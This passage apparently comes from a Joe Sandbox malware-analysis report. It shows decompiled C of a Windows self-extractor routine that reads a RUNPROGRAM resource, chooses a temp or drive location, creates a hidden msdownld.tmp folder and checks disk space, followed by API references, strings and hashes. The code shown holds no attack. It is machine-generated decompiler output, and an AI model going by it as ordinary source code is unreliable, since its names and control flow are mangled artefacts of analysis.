                                                                                                                                                                                                      				int _t70;
                                                                                                                                                                                                      				int _t71;
                                                                                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                      				int _t73;
                                                                                                                                                                                                      				CHAR* _t82;
                                                                                                                                                                                                      				CHAR* _t88;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t28 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                      				_t2 = E000E468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                      				if(_t109 != 0) {
                                                                                                                                                                                                      					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                      					_t32 = E000E468F(_t82, _t109, 1);
                                                                                                                                                                                                      					__eflags = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                      						__eflags = _t33;
                                                                                                                                                                                                      						if(_t33 == 0) {
                                                                                                                                                                                                      							 *0xe9a30 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						_t35 =  *0xe8b3e; // 0x0
                                                                                                                                                                                                      						__eflags = _t35;
                                                                                                                                                                                                      						if(_t35 == 0) {
                                                                                                                                                                                                      							__eflags =  *0xe8a24; // 0x0
                                                                                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                                                                                      								L46:
                                                                                                                                                                                                      								_t101 = 0x7d2;
                                                                                                                                                                                                      								_t36 = E000E6517(_t82, 0x7d2, 0, E000E3210, 0, 0);
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_t38 =  ~( ~_t36);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xe9a30; // 0x0
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L46;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t109 = 0xe91e4;
                                                                                                                                                                                                      									_t40 = GetTempPathA(0x104, 0xe91e4);
                                                                                                                                                                                                      									__eflags = _t40;
                                                                                                                                                                                                      									if(_t40 == 0) {
                                                                                                                                                                                                      										L19:
                                                                                                                                                                                                      										_push(_t82);
                                                                                                                                                                                                      										E000E1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                      										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                      										if(_v268 <= 0x5a) {
                                                                                                                                                                                                      											do {
                                                                                                                                                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                      												__eflags = _t109 - 6;
                                                                                                                                                                                                      												if(_t109 == 6) {
                                                                                                                                                                                                      													L22:
                                                                                                                                                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                      													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L23;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													__eflags = _t109 - 3;
                                                                                                                                                                                                      													if(_t109 != 3) {
                                                                                                                                                                                                      														L23:
                                                                                                                                                                                                      														__eflags = _t109 - 2;
                                                                                                                                                                                                      														if(_t109 != 2) {
                                                                                                                                                                                                      															L28:
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															goto L29;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t66 = _v268;
                                                                                                                                                                                                      															__eflags = _t66 - 0x41;
                                                                                                                                                                                                      															if(_t66 == 0x41) {
                                                                                                                                                                                                      																L29:
                                                                                                                                                                                                      																_t60 = _t66 + 1;
                                                                                                                                                                                                      																_v268 = _t60;
                                                                                                                                                                                                      																goto L42;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																__eflags = _t66 - 0x42;
                                                                                                                                                                                                      																if(_t66 == 0x42) {
                                                                                                                                                                                                      																	goto L29;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t68 = E000E6952( &_v268);
                                                                                                                                                                                                      																	__eflags = _t68;
                                                                                                                                                                                                      																	if(_t68 == 0) {
                                                                                                                                                                                                      																		goto L28;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                      																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                      																			L30:
                                                                                                                                                                                                      																			_push(0);
                                                                                                                                                                                                      																			_t103 = 3;
                                                                                                                                                                                                      																			_t49 = E000E597D( &_v268, _t103, 1);
                                                                                                                                                                                                      																			__eflags = _t49;
                                                                                                                                                                                                      																			if(_t49 != 0) {
                                                                                                                                                                                                      																				L33:
                                                                                                                                                                                                      																				_t50 = E000E2630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t50;
                                                                                                                                                                                                      																				if(_t50 != 0) {
                                                                                                                                                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				_t88 =  &_v268;
                                                                                                                                                                                                      																				E000E658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                      																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                      																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                      																					__eflags = _t54;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																				__eflags = _t54;
                                                                                                                                                                                                      																				if(_t54 != 0) {
                                                                                                                                                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                      																					_push(_t88);
                                                                                                                                                                                                      																					_t109 = 0xe91e4;
                                                                                                                                                                                                      																					E000E1781(0xe91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                      																					_t101 = 1;
                                                                                                                                                                                                      																					_t59 = E000E5467(0xe91e4, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t59;
                                                                                                                                                                                                      																					if(_t59 != 0) {
                                                                                                                                                                                                      																						goto L45;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						_t60 = _v268;
                                                                                                                                                                                                      																						goto L42;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t60 = _v268 + 1;
                                                                                                                                                                                                      																					_v265 = 0;
                                                                                                                                                                                                      																					_v268 = _t60;
                                                                                                                                                                                                      																					goto L42;
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			} else {
                                                                                                                                                                                                      																				_t65 = E000E2630(0,  &_v268, 1);
                                                                                                                                                                                                      																				__eflags = _t65;
                                                                                                                                                                                                      																				if(_t65 != 0) {
                                                                                                                                                                                                      																					goto L28;
                                                                                                                                                                                                      																				} else {
                                                                                                                                                                                                      																					_t67 = E000E597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                      																					__eflags = _t67;
                                                                                                                                                                                                      																					if(_t67 == 0) {
                                                                                                                                                                                                      																						goto L28;
                                                                                                                                                                                                      																					} else {
                                                                                                                                                                                                      																						goto L33;
                                                                                                                                                                                                      																					}
                                                                                                                                                                                                      																				}
                                                                                                                                                                                                      																			}
                                                                                                                                                                                                      																		} else {
                                                                                                                                                                                                      																			goto L28;
                                                                                                                                                                                                      																		}
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L22;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                                      												L42:
                                                                                                                                                                                                      												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                      											} while (_t60 <= 0x5a);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										goto L43;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t101 = 1;
                                                                                                                                                                                                      										_t69 = E000E5467(0xe91e4, 1, 3); // executed
                                                                                                                                                                                                      										__eflags = _t69;
                                                                                                                                                                                                      										if(_t69 != 0) {
                                                                                                                                                                                                      											goto L45;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t82 = 0xe91e4;
                                                                                                                                                                                                      											_t70 = E000E2630(0, 0xe91e4, 1);
                                                                                                                                                                                                      											__eflags = _t70;
                                                                                                                                                                                                      											if(_t70 != 0) {
                                                                                                                                                                                                      												goto L19;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t101 = 1;
                                                                                                                                                                                                      												_t82 = 0xe91e4;
                                                                                                                                                                                                      												_t71 = E000E5467(0xe91e4, 1, 1);
                                                                                                                                                                                                      												__eflags = _t71;
                                                                                                                                                                                                      												if(_t71 != 0) {
                                                                                                                                                                                                      													goto L45;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													do {
                                                                                                                                                                                                      														goto L19;
                                                                                                                                                                                                      														L43:
                                                                                                                                                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                      														_push(4);
                                                                                                                                                                                                      														_t101 = 3;
                                                                                                                                                                                                      														_t82 =  &_v268;
                                                                                                                                                                                                      														_t44 = E000E597D(_t82, _t101, 1);
                                                                                                                                                                                                      														__eflags = _t44;
                                                                                                                                                                                                      													} while (_t44 != 0);
                                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                      							if(_t35 != 0x5c) {
                                                                                                                                                                                                      								L10:
                                                                                                                                                                                                      								_t72 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								__eflags =  *0xe8b3f - _t35; // 0x0
                                                                                                                                                                                                      								_t72 = 0;
                                                                                                                                                                                                      								if(__eflags != 0) {
                                                                                                                                                                                                      									goto L10;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t101 = 0;
                                                                                                                                                                                                      							_t73 = E000E5467(0xe8b3e, 0, _t72);
                                                                                                                                                                                                      							__eflags = _t73;
                                                                                                                                                                                                      							if(_t73 != 0) {
                                                                                                                                                                                                      								L45:
                                                                                                                                                                                                      								_t38 = 1;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t101 = 0x4be;
                                                                                                                                                                                                      								E000E44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t101 = 0x4b1;
                                                                                                                                                                                                      						E000E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						LocalFree(_t109);
                                                                                                                                                                                                      						 *0xe9124 = 0x80070714;
                                                                                                                                                                                                      						goto L2;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t101 = 0x4b5;
                                                                                                                                                                                                      					E000E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					 *0xe9124 = E000E6285();
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					_t38 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L47:
                                                                                                                                                                                                      				return E000E6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                      			}





































                                                                                                                                                                                                      0x000e55ab
                                                                                                                                                                                                      0x000e55b2
                                                                                                                                                                                                      0x000e55c9
                                                                                                                                                                                                      0x000e55d5
                                                                                                                                                                                                      0x000e55d9
                                                                                                                                                                                                      0x000e5600
                                                                                                                                                                                                      0x000e5605
                                                                                                                                                                                                      0x000e560a
                                                                                                                                                                                                      0x000e560c
                                                                                                                                                                                                      0x000e5638
                                                                                                                                                                                                      0x000e5641
                                                                                                                                                                                                      0x000e5643
                                                                                                                                                                                                      0x000e5645
                                                                                                                                                                                                      0x000e5645
                                                                                                                                                                                                      0x000e564c
                                                                                                                                                                                                      0x000e5652
                                                                                                                                                                                                      0x000e5657
                                                                                                                                                                                                      0x000e5659
                                                                                                                                                                                                      0x000e5696
                                                                                                                                                                                                      0x000e569c
                                                                                                                                                                                                      0x000e589f
                                                                                                                                                                                                      0x000e58a7
                                                                                                                                                                                                      0x000e58ac
                                                                                                                                                                                                      0x000e58b3
                                                                                                                                                                                                      0x000e58b5
                                                                                                                                                                                                      0x000e56a2
                                                                                                                                                                                                      0x000e56a2
                                                                                                                                                                                                      0x000e56a8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e56ae
                                                                                                                                                                                                      0x000e56ae
                                                                                                                                                                                                      0x000e56b9
                                                                                                                                                                                                      0x000e56bf
                                                                                                                                                                                                      0x000e56c1
                                                                                                                                                                                                      0x000e56f3
                                                                                                                                                                                                      0x000e56f3
                                                                                                                                                                                                      0x000e5705
                                                                                                                                                                                                      0x000e570a
                                                                                                                                                                                                      0x000e5711
                                                                                                                                                                                                      0x000e5717
                                                                                                                                                                                                      0x000e5724
                                                                                                                                                                                                      0x000e5726
                                                                                                                                                                                                      0x000e5729
                                                                                                                                                                                                      0x000e5730
                                                                                                                                                                                                      0x000e5737
                                                                                                                                                                                                      0x000e573d
                                                                                                                                                                                                      0x000e5740
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e572b
                                                                                                                                                                                                      0x000e572b
                                                                                                                                                                                                      0x000e572e
                                                                                                                                                                                                      0x000e5742
                                                                                                                                                                                                      0x000e5742
                                                                                                                                                                                                      0x000e5745
                                                                                                                                                                                                      0x000e576b
                                                                                                                                                                                                      0x000e576b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5747
                                                                                                                                                                                                      0x000e5747
                                                                                                                                                                                                      0x000e574d
                                                                                                                                                                                                      0x000e574f
                                                                                                                                                                                                      0x000e5771
                                                                                                                                                                                                      0x000e5771
                                                                                                                                                                                                      0x000e5773
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5751
                                                                                                                                                                                                      0x000e5751
                                                                                                                                                                                                      0x000e5753
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5755
                                                                                                                                                                                                      0x000e575b
                                                                                                                                                                                                      0x000e5760
                                                                                                                                                                                                      0x000e5762
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5764
                                                                                                                                                                                                      0x000e5764
                                                                                                                                                                                                      0x000e5769
                                                                                                                                                                                                      0x000e577e
                                                                                                                                                                                                      0x000e577e
                                                                                                                                                                                                      0x000e5781
                                                                                                                                                                                                      0x000e5788
                                                                                                                                                                                                      0x000e578d
                                                                                                                                                                                                      0x000e578f
                                                                                                                                                                                                      0x000e57b2
                                                                                                                                                                                                      0x000e57b8
                                                                                                                                                                                                      0x000e57bd
                                                                                                                                                                                                      0x000e57bf
                                                                                                                                                                                                      0x000e57cd
                                                                                                                                                                                                      0x000e57cd
                                                                                                                                                                                                      0x000e57dd
                                                                                                                                                                                                      0x000e57e3
                                                                                                                                                                                                      0x000e57ef
                                                                                                                                                                                                      0x000e57f5
                                                                                                                                                                                                      0x000e57f8
                                                                                                                                                                                                      0x000e580a
                                                                                                                                                                                                      0x000e580a
                                                                                                                                                                                                      0x000e57fa
                                                                                                                                                                                                      0x000e5802
                                                                                                                                                                                                      0x000e5802
                                                                                                                                                                                                      0x000e580d
                                                                                                                                                                                                      0x000e580f
                                                                                                                                                                                                      0x000e5830
                                                                                                                                                                                                      0x000e5836
                                                                                                                                                                                                      0x000e583d
                                                                                                                                                                                                      0x000e584b
                                                                                                                                                                                                      0x000e5851
                                                                                                                                                                                                      0x000e5855
                                                                                                                                                                                                      0x000e585a
                                                                                                                                                                                                      0x000e585c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e585e
                                                                                                                                                                                                      0x000e585e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e585e
                                                                                                                                                                                                      0x000e5811
                                                                                                                                                                                                      0x000e5817
                                                                                                                                                                                                      0x000e5819
                                                                                                                                                                                                      0x000e581f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e581f
                                                                                                                                                                                                      0x000e5791
                                                                                                                                                                                                      0x000e5797
                                                                                                                                                                                                      0x000e579c
                                                                                                                                                                                                      0x000e579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e57a0
                                                                                                                                                                                                      0x000e57a9
                                                                                                                                                                                                      0x000e57ae
                                                                                                                                                                                                      0x000e57b0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e57b0
                                                                                                                                                                                                      0x000e579e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5769
                                                                                                                                                                                                      0x000e5762
                                                                                                                                                                                                      0x000e5753
                                                                                                                                                                                                      0x000e574f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e572e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5864
                                                                                                                                                                                                      0x000e5864
                                                                                                                                                                                                      0x000e5864
                                                                                                                                                                                                      0x000e5717
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e56c3
                                                                                                                                                                                                      0x000e56c5
                                                                                                                                                                                                      0x000e56c9
                                                                                                                                                                                                      0x000e56ce
                                                                                                                                                                                                      0x000e56d0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e56d6
                                                                                                                                                                                                      0x000e56d6
                                                                                                                                                                                                      0x000e56d8
                                                                                                                                                                                                      0x000e56dd
                                                                                                                                                                                                      0x000e56df
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e56e1
                                                                                                                                                                                                      0x000e56e2
                                                                                                                                                                                                      0x000e56e4
                                                                                                                                                                                                      0x000e56e6
                                                                                                                                                                                                      0x000e56eb
                                                                                                                                                                                                      0x000e56ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e56f3
                                                                                                                                                                                                      0x000e56f3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e586c
                                                                                                                                                                                                      0x000e5878
                                                                                                                                                                                                      0x000e587e
                                                                                                                                                                                                      0x000e5882
                                                                                                                                                                                                      0x000e5883
                                                                                                                                                                                                      0x000e5889
                                                                                                                                                                                                      0x000e588e
                                                                                                                                                                                                      0x000e588e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5896
                                                                                                                                                                                                      0x000e56ed
                                                                                                                                                                                                      0x000e56df
                                                                                                                                                                                                      0x000e56d0
                                                                                                                                                                                                      0x000e56c1
                                                                                                                                                                                                      0x000e56a8
                                                                                                                                                                                                      0x000e565b
                                                                                                                                                                                                      0x000e565b
                                                                                                                                                                                                      0x000e565d
                                                                                                                                                                                                      0x000e5669
                                                                                                                                                                                                      0x000e5669
                                                                                                                                                                                                      0x000e565f
                                                                                                                                                                                                      0x000e565f
                                                                                                                                                                                                      0x000e5665
                                                                                                                                                                                                      0x000e5667
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5667
                                                                                                                                                                                                      0x000e566c
                                                                                                                                                                                                      0x000e5673
                                                                                                                                                                                                      0x000e5678
                                                                                                                                                                                                      0x000e567a
                                                                                                                                                                                                      0x000e589b
                                                                                                                                                                                                      0x000e589b
                                                                                                                                                                                                      0x000e5680
                                                                                                                                                                                                      0x000e5685
                                                                                                                                                                                                      0x000e568c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e568c
                                                                                                                                                                                                      0x000e567a
                                                                                                                                                                                                      0x000e560e
                                                                                                                                                                                                      0x000e5613
                                                                                                                                                                                                      0x000e561a
                                                                                                                                                                                                      0x000e5620
                                                                                                                                                                                                      0x000e5626
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5626
                                                                                                                                                                                                      0x000e55db
                                                                                                                                                                                                      0x000e55e0
                                                                                                                                                                                                      0x000e55e7
                                                                                                                                                                                                      0x000e55f1
                                                                                                                                                                                                      0x000e55f6
                                                                                                                                                                                                      0x000e55f6
                                                                                                                                                                                                      0x000e55f6
                                                                                                                                                                                                      0x000e58b7
                                                                                                                                                                                                      0x000e58c7

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000E55CF
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 000E5638
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 000E564C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 000E5620
                                                                                                                                                                                                        • Part of subcall function 000E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 000E4518
                                                                                                                                                                                                        • Part of subcall function 000E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 000E4554
                                                                                                                                                                                                        • Part of subcall function 000E6285: GetLastError.KERNEL32(000E5BBC), ref: 000E6285
                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 000E56B9
                                                                                                                                                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 000E571E
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 000E5737
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000E57CD
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000E57EF
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 000E5802
                                                                                                                                                                                                        • Part of subcall function 000E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 000E2654
                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 000E5830
                                                                                                                                                                                                        • Part of subcall function 000E6517: FindResourceA.KERNEL32(000E0000,000007D6,00000005), ref: 000E652A
                                                                                                                                                                                                        • Part of subcall function 000E6517: LoadResource.KERNEL32(000E0000,00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 000E6538
                                                                                                                                                                                                        • Part of subcall function 000E6517: DialogBoxIndirectParamA.USER32(000E0000,00000000,00000547,000E19E0,00000000), ref: 000E6557
                                                                                                                                                                                                        • Part of subcall function 000E6517: FreeResource.KERNEL32(00000000,?,?,000E2EE8,00000000,000E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 000E6560
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 000E5878
                                                                                                                                                                                                        • Part of subcall function 000E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000E59A8
                                                                                                                                                                                                        • Part of subcall function 000E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000E59AF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                      • API String ID: 2436801531-429805196
                                                                                                                                                                                                      • Opcode ID: ef0d9e4df9dc0f0d8ba89aa9e226ea3facfcc48602d3627dec2f0732cfd92aec
                                                                                                                                                                                                      • Instruction ID: 74f643f0dfbef0e76acd92515bb69fd3c197b861d3d3be8be18aab4929db84e3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef0d9e4df9dc0f0d8ba89aa9e226ea3facfcc48602d3627dec2f0732cfd92aec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20814B70B04AC45EEB609B339D85BFE72AD9B65709F0008A5F5C6F7192DFB48EC18A10
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 324 e597d-e59b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 e59dd-e5a1b GetDiskFreeSpaceA 324->325 326 e59bb-e59d8 call e44b9 call e6285 324->326 328 e5ba1-e5bde memset call e6285 GetLastError FormatMessageA 325->328 329 e5a21-e5a4a MulDiv 325->329 341 e5c05-e5c14 call e6ce0 326->341 338 e5be3-e5bfc call e44b9 SetCurrentDirectoryA 328->338 329->328 332 e5a50-e5a6c GetVolumeInformationA 329->332 335 e5a6e-e5ab0 memset call e6285 GetLastError FormatMessageA 332->335 336 e5ab5-e5aca SetCurrentDirectoryA 332->336 335->338 340 e5acc-e5ad1 336->340 353 e5c02 338->353 344 e5ae2-e5ae4 340->344 345 e5ad3-e5ad8 340->345 348 e5ae6 344->348 349 e5ae7-e5af8 344->349 345->344 346 e5ada-e5ae0 345->346 346->340 346->344 348->349 352 e5af9-e5afb 349->352 354 e5afd-e5b03 352->354 355 e5b05-e5b08 352->355 356 e5c04 353->356 354->352 354->355 357 e5b0a-e5b1b call e44b9 355->357 358 e5b20-e5b27 355->358 356->341 357->353 360 e5b29-e5b33 358->360 361 e5b52-e5b5b 358->361 360->361 363 e5b35-e5b50 360->363 364 e5b62-e5b6d 361->364 363->364 365 e5b6f-e5b74 364->365 366 e5b76-e5b7d 364->366 367 e5b85 365->367 368 e5b7f-e5b81 366->368 369 e5b83 366->369 370 e5b96-e5b9f 367->370 371 e5b87-e5b94 call e268b 367->371 368->367 369->367 370->356 371->356
                                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                                      			E000E597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v16;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				char _v788;
                                                                                                                                                                                                      				long _v792;
                                                                                                                                                                                                      				long _v796;
                                                                                                                                                                                                      				long _v800;
                                                                                                                                                                                                      				signed int _v804;
                                                                                                                                                                                                      				long _v808;
                                                                                                                                                                                                      				int _v812;
                                                                                                                                                                                                      				long _v816;
                                                                                                                                                                                                      				long _v820;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t46;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                      				void* _t66;
